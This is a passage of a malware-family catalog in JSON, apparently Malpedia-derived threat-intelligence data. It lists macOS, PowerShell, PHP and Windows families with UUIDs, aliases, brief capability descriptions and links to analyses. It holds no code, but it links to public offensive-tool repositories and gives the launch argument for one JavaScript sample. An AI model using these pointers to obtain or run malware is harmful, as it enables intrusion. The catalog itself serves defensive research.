"http://resources.infosecinstitute.com/scanbox-framework/" ], "synonyms": [], "type": [] }, "uuid": "0a13a546-91a2-4de0-9bbb-71c9233ce6fa", "value": "scanbox" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_ff_ext", "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/" ], "synonyms": [], "type": [] }, "uuid": "c7ab9e5a-0ec9-481e-95ec-ad08f06cf985", "value": "HTML5 Encoding" }, { "description": "Expects a parameter to run: needs to be started as 'maintools.js EzZETcSXyKAdF_e5I2i1'.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_maintools", "https://twitter.com/JohnLaTwC/status/915590893155098629" ], "synonyms": [], "type": [] }, "uuid": "218f8ca8-1124-4e44-8fbd-4b05b46bde4b", "value": "Maintools.js" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_050", "https://community.riskiq.com/projects/53b4bd1e-dad0-306b-7712-d2a608400c8f", "https://gist.github.com/9b/141a5c7ab8b4280901722e2cd931b7ef" ], "synonyms": [], "type": [] }, "uuid": "f2b0ffdc-7d4e-4786-8935-e7036faa174d", "value": "Unidentified 050 (APT32 Profiler)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.witchcoven", "https://www2.fireeye.com/rs/848-DID-242/images/rpt-witchcoven.pdf" ], "synonyms": [], "type": [] }, "uuid": "dcc0fad2-29a9-4b69-9d75-d288ca458bc7", "value": "witchcoven" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.bella", "https://github.com/kai5263499/Bella", "https://blog.malwarebytes.com/threat-analysis/2017/05/another-osx-dok-dropper-found-installing-new-backdoor/" ], "synonyms": [], "type": [] }, "uuid": "3c5036ad-2afc-4bc1-a5a3-b31797f46248", "value": "Bella" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.careto", 
"https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed" ], "synonyms": [ "Appetite", "Mask" ], "type": [] }, "uuid": "dcabea75-a433-4157-bb7a-be76de3026ac", "value": "Careto" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cointhief", "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed" ], "synonyms": [], "type": [] }, "uuid": "70e73da7-21d3-4bd6-9a0e-0c904e6457e8", "value": "CoinThief" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.coldroot_rat", "https://objective-see.com/blog/blog_0x2A.html" ], "synonyms": [], "type": [] }, "uuid": "076a7ae0-f4b8-45c7-9de4-dc9cc7e54bcf", "value": "Coldroot RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cpumeaner", "https://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/" ], "synonyms": [], "type": [] }, "uuid": "74360d1e-8f85-44d1-8ce7-e76afb652142", "value": "CpuMeaner" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.creative_updater", "https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/", "https://objective-see.com/blog/blog_0x29.html", "https://digitasecurity.com/blog/2018/02/05/creativeupdater/" ], "synonyms": [], "type": [] }, "uuid": "40fc6f71-75ac-43ac-abd9-c90b0e847999", "value": "CreativeUpdater" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.crisis", "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?", "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines" ], "synonyms": [], "type": [] }, "uuid": "4b2ab902-811e-4b50-8510-43454d77d027", "value": "Crisis (OS X)" }, { 
"description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.crossrider", "https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/?utm_source=twitter&utm_medium=social" ], "synonyms": [], "type": [] }, "uuid": "05ddb459-5a2f-44d5-a135-ed3f1e772302", "value": "Crossrider" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.dockster", "http://contagiodump.blogspot.com/2012/12/osxdockstera-and-win32trojanagentaxmo.html", "https://www.f-secure.com/weblog/archives/00002466.html" ], "synonyms": [], "type": [] }, "uuid": "713d8ec4-4983-4fbb-827c-2ef5bc0e6930", "value": "Dockster" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.dummy", "https://objective-see.com/blog/blog_0x32.html" ], "synonyms": [], "type": [] }, "uuid": "cbf9ff89-d35b-4954-8873-32f59f5e4d7d", "value": "Dummy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.evilosx", "https://github.com/Marten4n6/EvilOSX", "https://twitter.com/JohnLaTwC/status/966139336436498432" ], "synonyms": [], "type": [] }, "uuid": "24f3d8e1-3936-4664-b813-74c797b87d9d", "value": "EvilOSX" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.flashback", "http://contagiodump.blogspot.com/2012/04/osxflashbacko-sample-some-domains.html", "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed", "http://contagiodump.blogspot.com/2012/04/osxflashbackk-sample-mac-os-malware.html" ], "synonyms": [], "type": [] }, "uuid": "f92b5355-f398-4f09-8bcc-e06df6fe51a0", "value": "FlashBack" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.fruitfly", "https://www.documentcloud.org/documents/4346338-Phillip-Durachinsky-Indictment.html", 
"https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/", "https://arstechnica.com/security/2017/07/perverse-malware-infecting-hundreds-of-macs-remained-undetected-for-years/", "https://www.virusbulletin.com/virusbulletin/2017/11/vb2017-paper-offensive-malware-analysis-dissecting-osxfruitflyb-custom-cc-server/", "https://arstechnica.com/security/2017/01/newly-discovered-mac-malware-may-have-circulated-in-the-wild-for-2-years/", "https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Patrick-Wardle-Offensive-Malware-Analysis-Fruit-Fly-UPDATED..pdf" ], "synonyms": [ "Quimitchin" ], "type": [] }, "uuid": "a517cdd1-6c82-4b29-bdd2-87e281227597", "value": "FruitFly" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.hiddenlotus", "https://blog.malwarebytes.com/threat-analysis/2017/12/interesting-disguise-employed-by-new-mac-malware/" ], "synonyms": [], "type": [] }, "uuid": "fc17e41f-e9f7-4442-a05c-7a19b9174c39", "value": "HiddenLotus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.imuler", "http://contagiodump.blogspot.com/2012/11/group-photoszip-osxrevir-osximuler.html", "https://nakedsecurity.sophos.com/2012/11/13/new-mac-trojan/" ], "synonyms": [ "Revir" ], "type": [] }, "uuid": "261fd543-60e4-470f-af28-7a9b17ba4759", "value": "iMuler" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.keranger", "https://objective-see.com/blog/blog_0x16.html", "https://www.macworld.com/article/3234650/macs/keranger-the-first-in-the-wild-ransomware-for-macs-but-certainly-not-the-last.html", "http://researchcenter.paloaltonetworks.com/2016/03/new-os-x-ransomware-keranger-infected-transmission-bittorrent-client-installer/" ], "synonyms": [], "type": [] }, "uuid": "01643bc9-bd61-42e8-b9f1-5fbf83dcd786", "value": "KeRanger" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.keydnap", "https://objective-see.com/blog/blog_0x16.html", "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/", "https://github.com/eset/malware-ioc/tree/master/keydnap" ], "synonyms": [], "type": [] }, "uuid": "2173605b-bf44-4c76-b75a-09c53bb322d6", "value": "Keydnap" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.kitmos", "https://www.f-secure.com/weblog/archives/00002558.html" ], "synonyms": [ "KitM" ], "type": [] }, "uuid": "8a1b1c99-c149-4339-9058-db3b4084cdcd", "value": "Kitmos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.komplex", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "https://objective-see.com/blog/blog_0x16.html", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf", "http://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/", "https://blog.malwarebytes.com/threat-analysis/2016/09/komplex-mac-backdoor-answers-old-questions/" ], "synonyms": [ "JHUHUGIT", "JKEYSKW", "SedUploader" ], "type": [] }, "uuid": "d26b5518-8d7f-41a6-b539-231e4962853e", "value": "Komplex" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.laoshu", "https://objective-see.com/blog/blog_0x16.html", "https://nakedsecurity.sophos.com/2014/01/21/data-stealing-malware-targets-mac-users-in-undelivered-courier-item-attack/" ], "synonyms": [], "type": [] }, "uuid": "a13a2cb8-b0e6-483a-9916-f44969a2c42b", "value": "Laoshu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.leverage", "https://www.alienvault.com/blogs/labs-research/osx-leveragea-analysis", "https://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/" ], "synonyms": [], "type": [] }, "uuid": 
"15daa766-f721-4fd5-95fb-153f5361fb87", "value": "Leverage" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macdownloader", "https://iranthreats.github.io/resources/macdownloader-macos-malware/" ], "synonyms": [], "type": [] }, "uuid": "910d3c78-1a9e-4600-a3ea-4aa5563f0f13", "value": "MacDownloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macinstaller", "https://objective-see.com/blog/blog_0x16.html" ], "synonyms": [], "type": [] }, "uuid": "d1f8af3c-719b-4f64-961b-8d89a2defa02", "value": "MacInstaller" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macransom", "https://objective-see.com/blog/blog_0x1E.html", "https://blog.fortinet.com/2017/06/09/macransom-offered-as-ransomware-as-a-service" ], "synonyms": [], "type": [] }, "uuid": "66862f1a-5823-4a9a-bd80-439aaafc1d8b", "value": "MacRansom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macspy", "https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service" ], "synonyms": [], "type": [] }, "uuid": "c9915d41-d1fb-45bc-997e-5cd9c573d8e7", "value": "MacSpy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macvx", "https://objective-see.com/blog/blog_0x16.html" ], "synonyms": [], "type": [] }, "uuid": "4db9012b-d3a1-4f19-935c-4dbc7fdd93fe", "value": "MacVX" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mami", "https://objective-see.com/blog/blog_0x26.html" ], "synonyms": [], "type": [] }, "uuid": "7759534c-3298-42e9-adab-896d7e507f4f", "value": "MaMi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mokes", "https://securelist.com/blog/research/75990/the-missing-piece-sophisticated-os-x-backdoor-discovered/", 
"https://objective-see.com/blog/blog_0x16.html" ], "synonyms": [], "type": [] }, "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", "value": "Mokes (OS X)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mughthesec", "https://objective-see.com/blog/blog_0x20.html" ], "synonyms": [], "type": [] }, "uuid": "aa1bf4e5-9c44-42a2-84e5-7526e4349405", "value": "Mughthesec" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.oceanlotus", "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update", "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/" ], "synonyms": [], "type": [] }, "uuid": "65b7eff4-741c-445e-b4e0-8a4e4f673a65", "value": "OceanLotus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.olyx", "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html", "https://news.drweb.com/show/?i=1750&lng=en&c=14" ], "synonyms": [], "type": [] }, "uuid": "cd397973-8f42-4c49-8322-414ea77ec773", "value": "Olyx" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.patcher", "http://www.welivesecurity.com/2017/02/22/new-crypto-ransomware-hits-macos/" ], "synonyms": [ "Findzip" ], "type": [] }, "uuid": "bad1057c-4f92-4747-a0ec-31bcc062dab8", "value": "Patcher" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pirrit", "http://www.zdnet.com/article/maker-of-sneaky-mac-adware-sends-security-researcher-cease-and-desist-letter/", 
"http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf" ], "synonyms": [], "type": [] }, "uuid": "b749ff3a-df68-4b38-91f1-649864eae52c", "value": "Pirrit" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.proton_rat", "https://www.cybereason.com/labs-blog/labs-proton-b-what-this-mac-malware-actually-does", "https://blog.malwarebytes.com/threat-analysis/mac-threat-analysis/2017/11/osx-proton-spreading-through-fake-symantec-blog/", "https://www.hackread.com/hackers-selling-undetectable-proton-mac-malware/", "https://securelist.com/calisto-trojan-for-macos/86543/", "https://threatpost.com/handbrake-for-mac-compromised-with-proton-spyware/125518/", "https://objective-see.com/blog/blog_0x1F.html", "https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/", "https://objective-see.com/blog/blog_0x1D.html", "https://www.cybersixgill.com/wp-content/uploads/2017/02/02072017%20-%20Proton%20-%20A%20New%20MAC%20OS%20RAT%20-%20Sixgill%20Threat%20Report.pdf" ], "synonyms": [ "Calisto" ], "type": [] }, "uuid": "d7e31f19-8bf2-4def-8761-6c5bf7feaa44", "value": "Proton RAT" }, { "description": "Cryptocurrency miner that was distributed masquerading as a Counter-Strike: Global Offensive hack.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pwnet", "https://sentinelone.com/blog/osx-pwnet-a-csgo-hack-and-sneaky-miner/" ], "synonyms": [], "type": [] }, "uuid": "70059ec2-9315-4af7-b65b-2ec35676a7bb", "value": "Pwnet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.retefe", "http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/", "https://www.govcert.admin.ch/blog/33/the-retefe-saga", "http://www.brycampbell.co.uk/new-blog/2017/4/30/retefe-and-osxdok-one-and-the-same", "https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/" ], "synonyms": [ "Retefe" ], 
"type": [] }, "uuid": "80acc956-d418-42e3-bddf-078695a01289", "value": "Dok" }, { "description": "General purpose backdoor", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.systemd", "https://vms.drweb.com/virus/?_is=1&i=15299312&lng=en" ], "synonyms": [], "type": [] }, "uuid": "a8e7687b-9db7-4606-ba81-320d36099e3a", "value": "systemd" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.uroburos", "https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/", "https://blog.malwarebytes.com/threat-analysis/2017/05/snake-malware-ported-windows-mac/" ], "synonyms": [], "type": [] }, "uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c", "value": "Uroburos (OS X)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.winnti", "https://401trg.pw/winnti-evolution-going-open-source/", "https://401trg.pw/an-update-on-winnti/" ], "synonyms": [], "type": [] }, "uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1", "value": "Winnti (OS X)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirelurker", "https://objective-see.com/blog/blog_0x16.html", "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" ], "synonyms": [], "type": [] }, "uuid": "bc32df24-8e80-44bc-80b0-6a4d55661aa5", "value": "WireLurker (OS X)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirenet", "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html", "https://news.drweb.com/show/?i=2679&lng=en&c=14" ], "synonyms": [], "type": [] }, "uuid": "47a8fedb-fd60-493a-9b7d-082bdb85621e", "value": "Wirenet (OS X)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xagent", "http://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/", 
"https://twitter.com/PhysicalDrive0/status/845009226388918273", "https://download.bitdefender.com/resources/files/News/CaseStudies/study/143/Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf" ], "synonyms": [], "type": [] }, "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", "value": "X-Agent (OS X)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xslcmd", "https://www.fireeye.com/blog/threat-research/2014/09/forced-to-adapt-xslcmd-backdoor-now-on-os-x.html", "https://objective-see.com/blog/blog_0x16.html" ], "synonyms": [], "type": [] }, "uuid": "120a5890-dc3e-42e8-950e-b5ff9a849d2a", "value": "XSLCmd" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/php.pas", "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity", "https://blog.erratasec.com/2016/12/some-notes-on-iocs.html" ], "synonyms": [], "type": [] }, "uuid": "e6a40fa2-f79f-40e9-89d3-a56984bc51f7", "value": "PAS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/php.wso", "https://github.com/wso-shell", "https://securelist.com/energetic-bear-crouching-yeti/85345/" ], "synonyms": [ "Webshell by Orb" ], "type": [] }, "uuid": "7f3794fc-662e-4dde-b793-49bcaccc96f7", "value": "WSO" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/pl.silence_ddos", "https://www.group-ib.com/resources/threat-research/silence.html" ], "synonyms": [], "type": [] }, "uuid": "b5cc7a39-305b-487e-b15a-02dcebefce90", "value": "Silence DDoS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.bondupdater", "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2", "https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/" ], "synonyms": [], "type": [] }, "uuid": 
"99600ba5-30a0-4ac8-8583-6288760b77c3", "value": "BONDUPDATER" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ghostminer", "https://blog.minerva-labs.com/ghostminer-cryptomining-malware-goes-fileless" ], "synonyms": [], "type": [] }, "uuid": "0db05333-2214-49c3-b469-927788932aaa", "value": "GhostMiner" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.poshspy", "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html", "https://github.com/matthewdunwoody/POSHSPY" ], "synonyms": [], "type": [] }, "uuid": "4df1b257-c242-46b0-b120-591430066b6f", "value": "POSHSPY" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerware", "https://blog.cylance.com/ransomware-update-todays-bountiful-cornucopia-of-extortive-threats" ], "synonyms": [], "type": [] }, "uuid": "5c5beab9-614c-4c86-b369-086234ddb43c", "value": "PowerWare" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powruner", "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2" ], "synonyms": [], "type": [] }, "uuid": "63f6df51-4de3-495a-864f-0a7e30c3b419", "value": "POWRUNER" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.quadagent", "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca" ], "synonyms": [], "type": [] }, "uuid": "e27bfd65-4a58-416a-b03a-1ab1703edb24", "value": "QUADAGENT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.roguerobin", "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca", "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/" ], "synonyms": 
[], "type": [] }, "uuid": "1e27a569-1899-4f6f-8c42-aa91bf0a539d", "value": "RogueRobin" }, { "description": "sLoad is a PowerShell downloader that most frequently delivers Ramnit banker and includes noteworthy reconnaissance features. The malware gathers information about the infected system including a list of running processes, the presence of Outlook, and the presence of Citrix-related files. sLoad can also take screenshots and check the DNS cache for specific domains (e.g., targeted banks), as well as load external binaries.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.sload", "https://cyware.com/news/new-sload-malware-downloader-being-leveraged-by-apt-group-ta554-to-spread-ramnit-7d03f2d9", "https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy", "https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/", "https://www.vkremez.com/2018/08/lets-learn-in-depth-into-latest-ramnit.html" ], "synonyms": [], "type": [] }, "uuid": "e78c0259-9299-4e55-b934-17c6a3ac4bc2", "value": "sLoad" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.tater", "https://github.com/Kevin-Robertson/Tater" ], "synonyms": [], "type": [] }, "uuid": "808445e6-f51c-4b5d-a812-78102bf60d24", "value": "Tater PrivEsc" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.thundershell", "https://github.com/Mr-Un1k0d3r/ThunderShell" ], "synonyms": [], "type": [] }, "uuid": "fd9904a6-6e06-4b50-8bfd-64ffb793d4a4", "value": "ThunderShell" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wmimplant", "https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html" ], "synonyms": [], "type": [] }, "uuid": "d1150a1a-a2f4-4954-b22a-a85b7876408e", "value": "WMImplant" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/py.brickerbot", "https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/", "https://www.bleepingcomputer.com/news/security/brickerbot-author-claims-he-bricked-two-million-devices/", "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", "https://www.trustwave.com/Resources/SpiderLabs-Blog/BrickerBot-mod_plaintext-Analysis/", "https://www.bleepingcomputer.com/news/security/brickerbot-author-retires-claiming-to-have-bricked-over-10-million-iot-devices/", "http://depastedihrn3jtw.onion/show.php?md5=2c822a990ff22d56f3b9eb89ed722c3f", "https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-102-01A", "http://seclists.org/fulldisclosure/2017/Mar/7" ], "synonyms": [], "type": [] }, "uuid": "f0ff8751-c182-4e9c-a275-81bb03e0cdf5", "value": "BrickerBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.saphyra", "https://securityintelligence.com/dissecting-hacktivists-ddos-tool-saphyra-revealed/", "https://www.youtube.com/watch?v=Bk-utzAlYFI" ], "synonyms": [], "type": [] }, "uuid": "30a22cdb-9393-460b-86ae-08d97c626155", "value": "Saphyra" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/symbian.flexispy", "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" ], "synonyms": [], "type": [] }, "uuid": "4305d59a-0d07-4021-a902-e7996378898b", "value": "FlexiSpy (symbian)" }, { "description": "The NJCCIC describes 7ev3n as a ransomware \"that targets the Windows OS and spreads via spam emails containing malicious attachments, as well as file sharing networks. It installs multiple files in the LocalAppData folder, each of which controls different functions including disabling bootup recovery options, deleting the ransomware installation file, encrypting data, and gaining administrator privileges. 
This variant also adds registry keys that disables various Windows function keys such as F1, F3, F4, F10, Alt, Num Lock, Ctrl, Enter, Escape, Shift, and Tab. Files encrypted by 7ev3n are labeled with a .R5A extension. It also locks victims out of Windows recovery options making it challenging to repair the damage done by 7ev3n.\"", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.7ev3n", "https://blog.malwarebytes.com/threat-analysis/2016/05/7ev3n-ransomware/", "https://www.cyber.nj.gov/threat-profiles/ransomware-variants/7ev3n" ], "synonyms": [], "type": [] }, "uuid": "ac2608e9-7851-409f-b842-e265b877a53c", "value": "7ev3n" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.9002", "https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html", "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", "https://community.hpe.com/t5/Security-Research/9002-RAT-a-second-building-on-the-left/ba-p/6894315", "http://researchcenter.paloaltonetworks.com/2016/07/unit-42-attack-delivers-9002-trojan-through-google-drive/", "https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html", "https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/", "https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures", "https://www.fireeye.com/blog/threat-research/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/supply-chain-attack-operation-red-signature-targets-south-korean-organizations/" ], "synonyms": [ "Hydraq", "McRAT" ], "type": [] }, "uuid": "bab647d7-c9d6-4697-8fd2-1295c7429e1f", "value": "9002 RAT" }, { 
"description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon_pos", "https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak", "https://threatpost.com/new-pos-malware-pinkkite-takes-flight/130428/", "https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software" ], "synonyms": [ "PinkKite" ], "type": [] }, "uuid": "a492a3e0-13cb-4b7d-93c1-027e7e69b44d", "value": "AbaddonPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.abantes", "https://github.com/ElektroKill/AbantesTrojan" ], "synonyms": [], "type": [] }, "uuid": "27b54000-26b5-405f-9296-9fbc9217a8c9", "value": "abantes" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.abbath_banker" ], "synonyms": [], "type": [] }, "uuid": "e46262cd-961f-4c7d-8976-0d35a066ab83", "value": "Abbath Banker" }, { "description": "AcridRain is a password stealer written in C/C++. This malware can steal credentials, cookies, credit cards from multiple browsers. 
